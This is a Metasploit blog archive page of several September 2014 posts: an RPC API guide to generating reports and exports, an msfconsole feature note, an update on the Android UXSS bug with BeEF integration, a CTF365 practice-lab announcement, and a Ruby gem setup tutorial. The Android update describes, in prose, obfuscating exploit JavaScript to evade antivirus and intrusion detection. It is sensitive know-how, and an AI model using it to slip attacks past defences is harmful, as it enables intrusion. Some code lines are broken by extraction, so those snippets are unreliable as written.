All Places > Metasploit > Blog > 2014 > September

The Metasploit RPC API provides a straightforward, programmatic way to accomplish basic tasks with your Metasploit Pro instance. Two of its key capabilities are export generation, to back up your data, and report generation, to summarize and share your findings. The RPC API docs are currently undergoing a major overhaul and are a bit out of date for report and export generation. This post provides all the examples and configuration options you need to get running.


Setting up a client to make the API calls is simple:


# This class is defined under pro/api-example
require_relative 'metasploit_rpc_client'

client = MetasploitRPCClient.new(host: host, token: api_token, ssl: false, port: 50505)


Note that there are example scripts shipped with Metasploit Pro that show these examples and more. They can be found inside the install directory (on *nix systems, /opt/metasploit) under apps/pro/api-example. They are simple wrappers that let you pass in the required arguments, so they're good for getting a feel for things. In addition to the API calling code, however you implement it, you need to have the Metasploit Pro instance running and you need to generate an API key. This can be done from Administration -> Global Settings.
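For orientation, here is a minimal, hypothetical sketch of what such a wrapper looks like. The class and method names are ours for illustration only (the real transport is MessagePack-RPC over HTTP, omitted here); this is not the shipped metasploit_rpc_client code.

```ruby
# Hypothetical stand-in for the api-example wrapper; illustration only.
class ExampleRpcClient
  def initialize(host:, token:, port: 50505, ssl: true)
    @host  = host
    @port  = port
    @token = token
    @ssl   = ssl
  end

  # Every Pro API call is a method name plus arguments, with the
  # authentication token inserted after the method name.
  def call(method_name, *args)
    payload = [method_name, @token, *args]
    # A real client would msgpack-encode `payload` and POST it to the
    # RPC endpoint on the Pro instance; here we just return it.
    payload
  end
end

client = ExampleRpcClient.new(host: '127.0.0.1', token: 'abc123', ssl: false)
```

The point is simply that each `pro.*` call is a method name plus positional arguments, with the token handled for you by the wrapper.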



Listing existing reports

report_list displays all reports that have been generated in the workspace you specify:


report_list = client.call('pro.report_list', workspace_name)
puts "Existing Reports: #{report_list}"

Sample output:

Existing Reports: {7=>[{"id"=>6, "report_id"=>7, "file_path"=>"/Users/shuckins/rapid7/pro/reports/artifacts/CredentialMetaModule-20140912105153.pdf", 
"created_at"=>1410537159, "updated_at"=>1410537159, "accessed_at"=>nil, "workspace_id"=>2, "created_by"=>"shuckins", "report_type"=>"mm_auth", "file_size"=>34409}],

The keys of the Hash are the report IDs, needed for download as will be seen below. The value Array contains all the artifacts that were generated. An artifact is simply a particular file in a particular format. For example, when you generate an Audit report and select file formats PDF, HTML, and Doc, this results in a single report with three child artifacts.
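You can flatten that report-ID-to-artifacts structure into one simple artifact list. The hash below mirrors the sample output above, trimmed to the relevant keys; in real use it would come from the report_list call.

```ruby
# Flatten the { report_id => [artifact rows] } structure into one list.
# `report_list` mirrors the sample output above, trimmed to relevant keys.
report_list = {
  7 => [
    { 'id' => 6, 'report_id' => 7,
      'file_path' => '/tmp/CredentialMetaModule-20140912105153.pdf',
      'report_type' => 'mm_auth', 'file_size' => 34409 }
  ]
}

artifacts = report_list.flat_map do |report_id, rows|
  rows.map do |row|
    { report_id: report_id, artifact_id: row['id'], path: row['file_path'] }
  end
end

artifacts.each do |a|
  puts "report #{a[:report_id]} -> artifact #{a[:artifact_id]} (#{a[:path]})"
end
```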

Getting information on available reports to generate

type_list = client.call('pro.list_report_types')
puts "Allowed Report types: #{type_list}"


Sample output (snipped, full output includes every report type):

Allowed Report types:
{"activity"=>{"required_data"=>"tasks", "file_formats"=>"pdf, html, rtf", "options"=>"include_task_logs",
"sections"=>"cover, project_summary, task_details", "report_directory"=>"/Users/shuckins/rapid7/pro/reports/activity/", "parent_template_file"=>"/Users/shuckins/rapid7/pro/reports/activity/main.jrxml"},


Downloading a report (all child artifacts)

report_id = 1 # Get this from the report_list call
report = client.call('pro.report_download', report_id)

report['report_artifacts'].each_with_index do |a, i|
  tmp_path = "/tmp/report_test_#{i}_#{Time.now.to_i}#{File.extname(a['file_path'])}"
  File.open(tmp_path, 'w') { |c| c.write a['data'] }
  puts "Wrote report artifact #{report_id} to #{tmp_path}"
end


This will download every artifact related to this report generation (1-4 files depending on format selection).


Downloading particular report artifacts

If you only want a particular artifact file under a report, you can download that using the artifact ID provided from the report_list call.


report_artifact_id = 1
artifact = client.call('pro.report_artifact_download', report_artifact_id)

tmp_path = "/tmp/report_#{report_artifact_id}#{File.extname(artifact['file_path'])}"
File.open(tmp_path, 'w') { |c| c.write artifact['data'] }
puts "Wrote report artifact #{report_artifact_id} to #{tmp_path}"


Generating a report

There are a number of options available for this call, detailed below. This basic version generates a single PDF artifact of the Audit report:

report_hash = {
  workspace:    workspace_name,
  name:         "SuperTest_#{Time.now.to_i}",
  report_type:  :audit,
  created_by:   'whoareyou',
  file_formats: [:pdf]
}

report_creation = client.call('pro.start_report', report_hash)
puts "Created report: #{report_creation}"

There's currently no API call to provide report (or export) generation status. The time required depends entirely on your data size and complexity. One place to check for status is the reports.log file.
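Since there is no status call, one pragmatic workaround is to poll report_list until an artifact for your report shows up. A hedged sketch (the timeout values are arbitrary, and `client` and `workspace_name` are assumed from the setup above):

```ruby
# Poll pro.report_list until an artifact whose file path contains
# `report_name` appears, or the timeout expires. Returns the report ID,
# or nil on timeout (in which case, check reports.log for errors).
def wait_for_report(client, workspace_name, report_name, timeout: 300, interval: 5)
  deadline = Time.now + timeout
  while Time.now <= deadline
    listing = client.call('pro.report_list', workspace_name)
    listing.each do |report_id, artifact_rows|
      # Artifact file names embed the report name, so match on the path.
      return report_id if artifact_rows.any? { |a| a['file_path'].to_s.include?(report_name) }
    end
    sleep interval
  end
  nil
end
```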

Configuration options

These are placed in the hash passed to the start_report call.


  • name: String, the name for the report shown in the web UI and in the file path; used in forming the filenames of the artifacts generated
  • report_type: String, must be one of those listed by list_report_types, e.g.: activity, audit, credentials, collected_evidence, compromised_hosts, custom, fisma, mm_auth, mm_pnd, mm_segment, pci, services, social_engineering, webapp_assessment
  • report_template: String, full file path to a custom Jasper jrxml template. Only set this when report_type is 'custom'; otherwise do not use it.
  • workspace_name: String, name of the workspace to which the report will be scoped
  • created_by: String, username to which the report should be attributed
  • file_formats: Array, the file format(s) of the artifacts to be generated. Must specify at least one. Available types vary slightly per report, 'pdf' is present for all. See list_report_types for formats per type.


  • email_recipients: String, addresses to which the report artifact(s) should be emailed. Addresses can be separated with comma, semicolon, newlines, or spaces.
  • mask_credentials: Boolean, whether credentials shown in report artifacts should be scrubbed (replaced with '*MASKED*')
  • included_addresses: String, space-separated addresses to include in the report. Can include wildcards, ranges, CIDR.
  • excluded_addresses: String, space-separated addresses to exclude from the report. Can include wildcards, ranges, CIDR. If included and excluded are both specified, they are both expanded and the address set used is included - excluded.
  • logo_path: String, full path to image file to use on cover page of report artifacts. If not specified, the Rapid7 logo is used. Must be of type: gif, png, jpg, or jpeg
  • options: sub hash of additional configuration options:
    • include_sessions: Boolean, whether information on sessions should be included in the report if applicable
    • include_charts: Boolean, whether graphs should be included in the report if applicable
    • include_page_code: Boolean, whether HTML code of pages in SE campaigns should be included in the report versus just an image preview of the rendered page
  • se_campaign_id: Integer, the ID of the SE campaign the report should cover. Only applied to SE report.
  • sections: Array, specific sections of the report to include. If this is specified only the specified sections will be included. If not specified all sections will be included. For section names, see list_report_types.
  • usernames_reported: String, comma-separated list of users to be included as active in the report. This is usually shown in the Executive summary section.
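Putting several of these options together, a fuller start_report configuration might look like the following sketch. The workspace, user, addresses, and section names are placeholders, not values from a real instance.

```ruby
# Hypothetical report configuration exercising the options above.
# All values are illustrative placeholders.
report_hash = {
  workspace:    'ThePlace',
  name:         "QuarterlyAudit_#{Time.now.to_i}",
  report_type:  :audit,
  created_by:   'whoareyou',
  file_formats: [:pdf, :html],

  mask_credentials:   true,
  included_addresses: '10.0.0.0/24',
  excluded_addresses: '',
  sections:           ['cover', 'project_summary'],

  options: {
    include_sessions: true,
    include_charts:   true
  }
}

# report_creation = client.call('pro.start_report', report_hash)
```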


Export coverage is nearly identical to reports.

Listing existing exports

export_list = client.call('pro.export_list', workspace_name)
puts "Existing Exports: #{export_list}"


Generating an export

export_types = ['zip_workspace', 'xml', 'replay_scripts', 'pwdump']

# NOTE: If you are not on the latest update of 4.10 (4.10.0-2014092401), this requires
# workspace_id with an integer ID value. If you've updated to that point, you can use
# workspace with a string name value, as below.
export_config = {created_by: 'whoareyou',
                 export_type: export_types[1],
                 workspace: 'ThePlace'}

export_creation = client.call('pro.start_export', export_config)
puts "Created export: #{export_creation}"


Downloading a generated export

export_id = 1
export ='pro.export_download', export_id)
tmp_path = "/tmp/export_test_#{export_id}#{File.extname(export['file_path'])}", 'w') {|c| c.write export['data']}
puts "Wrote export #{export_id} to #{tmp_path}"


Configuration options


  • created_by: String, username to which the export should be attributed
  • export_type: String, must be one of: zip_workspace, xml, replay_scripts, pwdump
  • workspace: String, name of the workspace to which export will be scoped


  • name: String, the name for the export shown in the web UI and in the file path; unacceptable characters are changed to underscores or removed
  • mask_credentials: Boolean, whether credentials shown in XML and other files should be scrubbed (replaced with '*MASKED*')
  • included_addresses: String, space-separated addresses to include in the export. Can include wildcards, ranges, CIDR.
  • excluded_addresses: String, space-separated addresses to exclude from the export. Can include wildcards, ranges, CIDR. If included and excluded are both specified, they are both expanded and the address set used is included - excluded.
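Analogously, an export configuration can combine the optional keys above. A sketch with placeholder values (assuming a Pro version new enough to accept workspace by name):

```ruby
# Hypothetical export configuration; all values are placeholders.
export_config = {
  created_by:  'whoareyou',
  export_type: 'zip_workspace',
  workspace:   'ThePlace',

  name:               'weekly_backup',
  mask_credentials:   true,
  included_addresses: '10.0.0.0/24 10.0.1.1-10.0.1.50',
  excluded_addresses: ''
}

# export_creation = client.call('pro.start_export', export_config)
```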

Hello, Metasploiters! Just wanted to update y'all on a new feature in msfconsole that *hopefully* should make vgrepping through module options a little easier.


Show empty required options


The new command is show missing, and all it does is show empty required options. Instead of looking through a long list of options and picking out the required ones that haven't been set, just run show missing, and a list of unset required options will be shown.


Here's an example with smb_login:



Pretty snazzy, huh?


It also works on payload options, as we can see with good ol' ms08_067_netapi:



That's all there is to it!

First things first -- today is International Talk Like a Pirate Day, which is great for me, given my office decor. Arrr! So grab a flagon of grog, and read on, ye landlubbers!


Updates to the Android Universal XSS bug (CVE-2014-6041)

This has been a pretty busy week for us here in Metasploit Nation. You probably heard about Rafay Baloch's kind of massive SOP-busting Android disclosure affecting the stock Android Open Source browser. Well, we've been digging into this some more, and have a couple new findings to report.


First off, it's not limited to just the AOSP browser. Other browsers that use the vulnerable version of WebView are also affected. We've successfully exploited both the Maxthon Browser (which claims 600 million downloads) and the CM Browser (which has 10 million to 50 million installs). We're confident there are plenty of apps that use WebView that are vulnerable to this UXSS, and so far, I haven't seen a lot of patching activity beyond Google's upstream patches to Android (reported to us by Paul Irish of Google). Of course, patching upstream doesn't really help the downstream users, unless and until the carriers and handset manufacturers roll it out. So, if you're on a pre-4.4 phone (which is likely, given that 75% of all active Android devices are pre-KitKat), be careful out there. Consider using an alternative, non-vulnerable browser -- Google Chrome and Mozilla Firefox are fine choices, assuming you have enough hardware oomph to run them.


Second, we've landed a fix to the Metasploit module to better enable integration with BeEF, the Browser Exploitation Framework. BeEF, by Wade Alcorn and friends, is a pretty powerful exploit toolkit that takes advantage of cross-site scripting bugs to "hook" browsers into doing the bidding of the BeEF operator. In fact, we shot a quick five minute video yesterday to demonstrate this functionality.




While most demos involving BeEF do silly things like play pirate sea shanties on the victim's device, keep in mind that the security context of the code executed is that of the XSS-vulnerable site. With a universal XSS bug (UXSS) like this, all sites are vulnerable. It becomes trivial for attackers to GET and POST on behalf of the user to any site the user is authenticated to -- Facebook, company webmail, Amazon, Alibaba... the level of hijinks is really only limited by the imagination of the attacker. This is why a breakdown of the Same Origin Policy is so damaging; it's just about the worst thing that can happen to a web browser, or anything with browser-like functionality, short of a full shell.


Obfuscating Metasploit-Delivered Javascript

Also this week, Wei sinn3r Chen has been busily updating the Metasploit Framework Wiki with new material on obfuscating Javascript code for Metasploit module developers. One of the challenges penetration testers face is not being able to use an exploit against a vulnerable target due to layers of signature-based detection or prevention. As an exploit dev, it's important to take this into consideration during development. There are many ways to do this, of course. Javascript-based exploits are relatively easy to modify, so usually you can just change a few lines and make your exploit undetectable by your target's anti-virus, HIDS, or other protection mechanisms. You can make the browser not cache anything, so some anti-virus products simply never see the malicious code. Or you can obfuscate, which provides more automation and is easier to maintain. To learn more about Metasploit's JavaScript obfuscation APIs, you can read up on them on the wiki.


In addition, Wei and Joe Vennix (and friends) are also in the process of spinning out JSObfu as a Ruby gem. It was originally written by James Egypt Lee back in 2011, and it's high time for a refresh. We just stood up the GitHub repo today, so if you'd like to follow along and help out, pull requests accepted.


New Modules

Over the last week, we've added four new modules -- one exploit, and three auxiliary modules.


Exploit modules

Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness upon the next official update; you can check for these updates through the Software Updates menu under Administration.

After Metasploitable in the Cloud and bWAPP, CTF365 has increased both the number of its "vulnerable by design" servers and operating systems by adding HacmeBank and HacmeCasino as vulnerable web applications, courtesy of McAfee through Foundstone.


The machines run on Windows Server 2008 and Windows XP, thanks to Microsoft through their BizSpark startup program, and they are accessible to anyone who has a free CTF365 account.


Hacme Bank

Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Hacme Bank™ simulates a “real-world” online banking application, which was built with a number of known and common vulnerabilities such as SQL injection and cross-site scripting.




Hacme Casino

Hacme Casino™ is a learning platform for secure software development, targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.




By adding these components to our free pentest lab, we hope to help newcomers and aspiring ethical hackers find their way into the security industry as qualified security professionals.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. Also, if you’re a screencaster, feel free to use them in your video tutorials. Don’t forget to share your creations and experiences with the infosec community. We’d love to hear about them!


You can access the servers at:

http://hacmebank.ctf

http://hacmecasino.ctf


In order to access them, please remember that you have to be logged into our CTF365 VPN.

If there’s a vulnerable-by-design server or web app that you’d like to see in the CTF365 cloud, leave the information for us in a comment below. We’ll review it and, if we think it’ll be a valuable contribution, we’ll add it to the cloud in the future.

We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.


As Metasploit adopts community best practices around testing and code structure, we've started breaking up our new work (and parts of our old work) into separate projects that can be developed and tested independently.  These smaller projects take the form of Ruby gems and Rails::Engines.  As we've made more and more gems, we've settled on a repeatable process for creating new ones, and we thought our process might be useful for other developers in the community looking for an up-to-date guide on how to set up Ruby gems from scratch and get the most out of the free tools available to open source projects.




Your gem will be open source, so you're going to want to host your source control on one of the free source control services.  We use Github, and I'd recommend it because third-party tools are likely to offer Github integration before they support other source control services like Gitorious or Bitbucket.

Account Setup

If you don't have a Github account, set one up by signing up at github.com.

Repository Creation

Once logged into your Github account, go to github.com; you'll see two columns: the left-hand column is an activity stream, while the right column lists your repositories. Click the big green "+ New Repository" button to add a repository.

Repository Naming

What you name your repository is up to you, but you should keep the RubyGems naming conventions in mind.
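One convention worth knowing: in a gem name, hyphens conventionally map to directory separators in the require path (and module namespaces), while underscores stay literal. A tiny illustration; the helper name here is ours, not part of RubyGems:

```ruby
# Illustrative helper: convert a gem name to its conventional require path.
# Hyphens become path separators ("metasploit-yard" => require 'metasploit/yard');
# underscores are kept as-is ("ruby_parser" => require 'ruby_parser').
def require_path_for(gem_name)
  gem_name.tr('-', '/')
end

puts require_path_for('metasploit-yard')
```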

Other Options

You can leave the rest of the options at their default values and click "Create repository".  After the repository is created, Github will display options for uploading your code, but we haven't created any code yet, so let's do that.

RVM Installation

When developing Ruby projects on OSX (or Linux) we recommend using rvm (Ruby Version Manager); it's what we use.  Go to rvm.io and follow the installation instructions.

Local Repository Creation

The point of RVM is that you can have a different version of Ruby, and a separate set of gems, for each project you work on.  We'll use that ability to set up the tools to create your gem's repository.  In the steps below, replace <GEM_NAME> with the name of the repository you created on Github and <GITHUB_USERNAME> with your username on Github.

  1. Create a gemset for your gem: rvm use --create ruby-2.1@<GEM_NAME>
  2. Create the parent directory for your local git repository:

    1. cd ~
    2. mkdir git
    3. cd git
    4. mkdir <GITHUB_USERNAME>
    5. cd <GITHUB_USERNAME>
  3. Create the gem skeleton using bundler: bundle gem <GEM_NAME>
  4. cd <GEM_NAME>
  5. bundle gem won't create a commit in the git repository, so do that now: git add -A && git commit -m "bundle gem <GEM_NAME>"

Now, look back at Github in your browser and you'll see the instructions for pushing your local git repository to the remote repository on Github.  I've copied the instructions here for easier use:

git remote add origin<GITHUB_USERNAME>/<GEM_NAME>.git
git push -u origin master

Once the push has finished, refresh your browser and you'll see the gem skeleton in your Github repository.

Tool Integration

With the push to Github, you've now successfully started an open source gem project, but instead of stopping there, let's go on to add a common set of tools to take advantage of the project being open source.

Local Tools

We'll start with setting up some local tools that will help with development on our own machine.


Metasploit uses RSpec as its unit test framework.  RSpec can set itself up on installation, but it must also be declared in the gemspec file.

  1. Add rspec as a development dependency in <GEM_NAME>.gemspec:
    Gem::Specification.new do |spec|
      # ...
      spec.add_development_dependency 'rspec', '~> 3.1'
      # ...
    end
  2. Install the new gems: bundle install
  3. Use rspec to set itself up: rspec --init

rspec --init chooses some good defaults and includes comments on other options you can enable in spec/spec_helper.rb, but for Metasploit we want to make the most of the rspec 3 features, so we turn on some additional options; our spec/spec_helper.rb looks like this:

$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)

require 'GEM_NAME'

RSpec.configure do |config|
  config.expose_dsl_globally = false

  # These two settings work together to allow you to limit a spec run
  # to individual examples or groups you care about by tagging them with
  # `:focus` metadata. When nothing is tagged with `:focus`, all examples
  # get run.
  config.filter_run :focus
  config.run_all_when_everything_filtered = true

  # RSpec filters the backtrace by default so as not to be so noisy.
  # This causes the full backtrace to be printed when running a single
  # spec file (e.g. to troubleshoot a particular spec failure).
  config.full_backtrace = true

  # Print the 10 slowest examples and example groups at the
  # end of the spec run, to help surface which specs are running
  # particularly slow.
  config.profile_examples = 10

  # Run specs in random order to surface order dependencies. If you find an
  # order dependency and want to debug it, you can fix the order by providing
  # the seed, which is printed after each run.
  #     --seed 1234
  config.order = :random

  # Seed global randomization in this process using the `--seed` CLI option.
  # Setting this allows you to use `--seed` to deterministically reproduce
  # test failures related to randomization by passing the same `--seed` value
  # as the one that triggered the failure.
  Kernel.srand config.seed

  config.expect_with :rspec do |expectations|
    # Enable only the newer, non-monkey-patching expect syntax.
    expectations.syntax = :expect
  end

  # rspec-mocks config goes here. You can use an alternate test double
  # library (such as bogus or mocha) by changing the `mock_with` option here.
  config.mock_with :rspec do |mocks|
    # Enable only the newer, non-monkey-patching expect syntax.
    mocks.syntax = :expect

    mocks.patch_marshal_to_support_partial_doubles = false

    # Prevents you from mocking or stubbing a method that does not exist on
    # a real object.
    mocks.verify_partial_doubles = true
  end
end

To finish the RSpec setup, we want it runnable using rake.  We can do this by adding the following to the Rakefile:

require 'rspec/core/rake_task'

RSpec::Core::RakeTask.new(:spec)

task :default => :spec

You can now run your specs by calling rspec, rake spec, or just rake, but no tests are defined, so rspec isn't testing anything for us yet.  To get some benefit from rspec, we'll need to add a spec file.  Usually, we'd test the gem versioning at this point.

  1. mkdir spec/<GEM_NAME>
  2. edit spec/<GEM_NAME>/version_spec.rb
  3. Add the following code to spec/<GEM_NAME>/version_spec.rb:
    require 'spec_helper'

    RSpec.describe GEM_NAME do
      context 'CONSTANTS' do
        context 'VERSION' do
          subject(:version) { described_class::VERSION }

          it { is_expected.to be_a String }
          it { is_expected.to match(/\d+\.\d+\.\d+(-[a-zA-Z0-9]+)*/) }
        end
      end
    end
  4. Run your new spec: rake spec
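A version spec like the one above assumes the VERSION constant that bundle gem generates in lib/<GEM_NAME>/version.rb. For reference, that file looks roughly like this; "GemName" is a placeholder for your gem's actual module name:

```ruby
# Sketch of the generated lib/<GEM_NAME>/version.rb; "GemName" stands in
# for your gem's actual module name.
module GemName
  # Semantic version string, the value the version spec asserts against.
  VERSION = '0.0.1'
end
```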


We can use RSpec to test our code, but how do we know our tests cover all the gem code?  We need a tool that measures test coverage: SimpleCov.

  1. Add simplecov as a development dependency to <GEM_NAME>.gemspec:
    Gem::Specification.new do |spec|
      # ...
      spec.add_development_dependency 'simplecov'
      # ...
    end
  2. Install simplecov: bundle install
  3. Require simplecov before any other file in spec/spec_helper.rb:
    # require before anything else so coverage is shown for all project files
    require 'simplecov'
  4. Metasploit uses a SimpleCov configuration file, .simplecov, that works both with rake spec and with Rubymine, our Ruby IDE of choice:
    # RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
    # controlled by running with coverage, so don't explicitly start coverage (and
    # therefore generate a report) when in Rubymine.  This _will_ generate a report
    # whenever `rake spec` is run.
    unless ENV['RM_INFO']
      SimpleCov.start
    end

    SimpleCov.configure do
      # ignore this file
      add_filter '.simplecov'

      # Rake tasks aren't tested with rspec
      add_filter 'Rakefile'
      add_filter 'lib/tasks'

      # Changed Files in Git group
      untracked = `git ls-files --exclude-standard --others`
      unstaged = `git diff --name-only`
      staged = `git diff --name-only --cached`
      all = untracked + unstaged + staged
      changed_filenames = all.split("\n")

      add_group 'Changed' do |source_file|
        changed_filenames.detect { |changed_filename|
          source_file.filename.end_with?(changed_filename)
        }
      end

      add_group 'Libraries', 'lib'

      # Specs are reported on to ensure that all examples are being run and all
      # lets, befores, afters, etc are being used.
      add_group 'Specs', 'spec'
    end
  5. Now, when you run rake spec, you'll generate a coverage report.
  6. Open the coverage report: open coverage/index.html


By default, Ruby comes with a documentation format called RDoc, but for Metasploit we use YARD because it allows for more structured documentation through `@tags` that will be familiar to anyone who has used Doxygen or Javadoc, and because it supports extensions, as Metasploit has done with yard-metasploit-erd, which lets us include ERDs (Entity-Relationship Diagrams) in our documentation to make working with the database easier.
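For a flavor of what that structured documentation looks like, here is a small, hypothetical method documented with YARD tags; the tags live in ordinary comments, so this is plain Ruby:

```ruby
# Returns the larger of two port numbers.
#
# @param a [Integer] the first port number
# @param b [Integer] the second port number
# @return [Integer] whichever of `a` and `b` is larger
def max_port(a, b)
  a > b ? a : b
end
```

Running yard over a file like this produces HTML documentation with typed parameter and return information, which is exactly what Inch CI and rake yard evaluate later in this guide.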

At Rapid7, we've just released metasploit-yard, so we can share a common rake yard task.  The README explains how to set it up:

  1. Add metasploit-yard as a development dependency to <GEM_NAME>.gemspec:
    Gem::Specification.new do |spec|
      # ...
      spec.add_development_dependency 'metasploit-yard', '~> 1.0'
      # ...
    end
  2. Install metasploit-yard: bundle install
  3. Add the following to your Rakefile to load yard.rake from metasploit-yard:
    # Use find_all_by_name instead of find_by_name as find_all_by_name will return pre-release versions
    gem_specification = Gem::Specification.find_all_by_name('metasploit-yard').first

    Dir[File.join(gem_specification.gem_dir, 'lib', 'tasks', '**', '*.rake')].each do |rake|
      load rake
    end
  4. Run rake yard to see what you need to document.

Remote Tools

With RSpec, SimpleCov, and YARD set up, we can run tests and generate documentation locally, but doing everything locally is not enough: we need a second system, one that isn't our development machine, to run these steps too, to ensure they aren't passing merely because of some fluke of our local machine.

Travis CI

To test remotely, Metasploit uses Travis CI.  Travis CI is free for open source software and integrates well with Github, as Travis CI is able to automatically test that pull requests pass our specs.  This is a big help on metasploit-framework, where we're up to 3785 pull requests and 9200 builds.  Without Travis CI we'd have had to run those all by hand (an error-prone and time-consuming manual process) or roll a Jenkins build pipeline to handle all of that, which would be a significant maintenance overhead.

On Travis CI, we can build against multiple implementations and versions of Ruby.  Metasploit tries to build on all versions of MRI Ruby and the latest stable versions of JRuby and Rubinius (rbx in the .travis.yml).  We need to set up a Travis CI account and then push a .travis.yml to Github:

  1. Go to travis-ci.org
  2. Click "Sign in with Github" in the top-right corner
  3. On the left sidebar, click the "+" button to add a new repository for Travis CI to build.
  4. Select a repository to build by changing the slider on the right hand side of the table row from "Off" to "On"
  5. Add a .travis.yml to the root of your local git repository:
    language: ruby
    env:
      - RAKE_TASK=spec
    matrix:
      include:
        # documentation coverage is not influenced by ruby implementation, so only run once
        - rvm: 2.1
          env: RAKE_TASK=yard
    rvm:
      - '1.9.3'
      - '2.0'
      - '2.1'
      - 'ruby-head'
      - 'jruby-19mode'
      - 'rbx-2.2'
    script: "bundle exec rake $RAKE_TASK"
  6. Add a Travis CI badge to your README so users can quickly see whether your project's build is failing when they visit the repository on Github: [![Build Status](<GITHUB_USER>/<GEM_NAME>.svg?branch=master)](<GITHUB_USER>/<GEM_NAME>)
  7. Commit your change: git commit -am "Travis CI"
  8. Push your changes: git push
  9. Watch the build on Travis CI


CodeClimate is an automated code quality analyzer.  Metasploit uses it for both our open source and private repositories; however, CodeClimate can't cope with the sheer volume of code in metasploit-framework: metasploit-framework itself is a DoS attack on static analysis tools.  Like Travis CI, CodeClimate has a badge, which shows the code quality on a 4.0 GPA scale.  CodeClimate also monitors code coverage, so we'll be adding a coverage reporter on top of SimpleCov.

  1. Go to codeclimate.com and sign up for an account
  2. On your dashboard, click the "Add Open Source Repo" button
  3. Enter your repo name: <GITHUB_USER>/<GEM_NAME>
  4. Click "Import Repo from Github"
  5. On the repository page, click the "Settings" link
  6. Click the "Test Coverage" button in the left sidebar
  7. You'll want to encrypt the CODECLIMATE_REPO_TOKEN on Travis CI to prevent forks from affecting the original repo's coverage, so install the travis gem: gem install travis
  8. Encrypt the token: travis encrypt CODECLIMATE_REPO_TOKEN=<YOUR_TOKEN_HERE>
  9. Put the encrypted value (remember to substitute your value and not to use the example value below) in your .travis.yml:
        secure: "G0LDGrupZ+RAFzoPwd6bjfrWfwoU/V9RTswQXIUNmi640rW/CP86a8F9hQcAXdUwy7Ag1cwmlEEv2JDDbLopQdNvkh8B7M3PSIpmJWlBsj+UPMMcCz04oYiQB3G6xgYb4xeuY6cNqxiY2rTJMHlfUfTlSJf1Z0dh6hAS3alHpGw="
  10. Add the CodeClimate badge to the README: [![Code Climate](<GITHUB_USER>/<GEM_NAME>.png)](<GITHUB_USER>/<GEM_NAME>)
  11. Add codeclimate-test-reporter as a development dependency:
    Gem::Specification.new do |spec|
      # ...
      spec.add_development_dependency 'codeclimate-test-reporter'
      # ...
    end
  12. bundle install
  13. Add the following after require 'simplecov' in spec/spec_helper.rb:
    # ...
    require 'codeclimate-test-reporter'

    if ENV['TRAVIS'] == 'true'
      formatters = []

      # don't use `CodeClimate::TestReporter.start` as it will overwrite some .simplecov settings
      formatters << CodeClimate::TestReporter::Formatter

      SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[*formatters]
    end
    # ...
  14. git commit -am "CodeClimate"
  15. git push


Although CodeClimate has a coverage reporter, it only reports whether there are coverage issues.  To view the actual coverage reports online, as output locally by SimpleCov, Metasploit uses Coveralls.

  1. Go to coveralls.io
  2. Click "Sign up free with Github" in the top-right corner
  3. Click the "Add Repo" button on the Your Repositories screen
  4. Change the slider from "Off" to "On" next to your repository
  5. Add the Coveralls badge to your README: [![Coverage Status](<GITHUB_USER>/<GEM_NAME>.svg)](<GITHUB_USER>/<GEM_NAME>)
  6. Add coveralls as a development dependency:
    Gem::Specification.new do |spec|
      # ...
      spec.add_development_dependency 'coveralls'
      # ...
    end
  7. bundle install
  8. Change the SimpleCov formatters in spec/spec_helper.rb to include Coveralls::SimpleCov::Formatter:
    # ...
    require 'codeclimate-test-reporter'
    require 'coveralls'

    if ENV['TRAVIS'] == 'true'
      formatters = []

      # don't use `CodeClimate::TestReporter.start` as it will overwrite some .simplecov settings
      formatters << CodeClimate::TestReporter::Formatter
      formatters << Coveralls::SimpleCov::Formatter

      SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[*formatters]
    end
    # ...
  9. Add a .coveralls.yml file
    service_name: travis-ci
  10. git commit -am "Coveralls"
  11. git push


Metasploit's various gems depend on many other gems from the community.  We need to keep track of new versions of those gems in case there are vulnerabilities, both so we can update our usage of those gems and so we can write Metasploit Framework modules to exploit those vulnerabilities.  To monitor our gems, we use Gemnasium.  Gemnasium alerts about Rails vulnerabilities have triggered Rapid7's rapid mitigation response, with updates across our portfolio, multiple times in the past.

  1. Go to
  2. Click "Sign up"
  3. Click "Sign up with Github"
  4. Click "Authorize application" on Github
  5. Click "+ Add New Project"
  6. Click "Hosted on Github"
  7. Click "Allow Access" in the "Public Project" column so Gemnasium can automatically configure the Github hooks
  8. Click "Authorize application" on Github to authorize the expanded permissions for Gemnasium
  9. Click your username to expand the list of your repositories
  10. Check the repositories to monitor
  11. Click Submit
  12. Add the Gemnasium badge to the README: [![Dependency Status](<GITHUB_USER>/<GEM_NAME>.svg)](<GITHUB_USER>/<GEM_NAME>)
  13. git commit -am "Gemnasium"
  14. git push


Although you haven't released your gem yet, once you do, you'll want users who visit your Github repository to be able to find the latest released gem, which you can do with a RubyGems version badge.

  1. Add to your README: [![Gem Version](<GEM_NAME>.svg)](<GEM_NAME>)
  2. git commit -am "RubyGems version badge"
  3. git push

Inch CI

Inch CI checks our documentation, providing a second review on top of the checking Metasploit already does with metasploit-yard.

  1. Go to
  2. Enter the URL to your github repository:<GITHUB_USER>/<GEM_NAME>
  3. In the top-right corner click the "doc" badge
  4. Select "SVG" for the image format
  5. Copy the "Markdown" badge
  6. Add it to your README
  7. git commit -am "Inch CI"
  8. git push

Pull Review

PullReview is another static analysis tool like CodeClimate.  Metasploit uses both because PullReview has more detailed reviews and better handling of branches than CodeClimate, but CodeClimate is cheaper for our team for private repositories.  Just like CodeClimate, PullReview can't handle analysing metasploit-framework, but instead of lagging behind and reporting odd or out-of-date analysis, PullReview just won't return an analysis.  Metasploit has had discussions with PullReview, and they were nice enough to send us an offline analysis.

  1. Go to
  2. Enter your github username and sign up
  3. Click "Authorize application" on Github
  4. Click "Authorize access to my repositories on Github"
  5. Click "Authorize application" on Github to authorize PullReview to post reviews and setup hooks
  6. Click the "+ Review" button next to repository you want reviewed
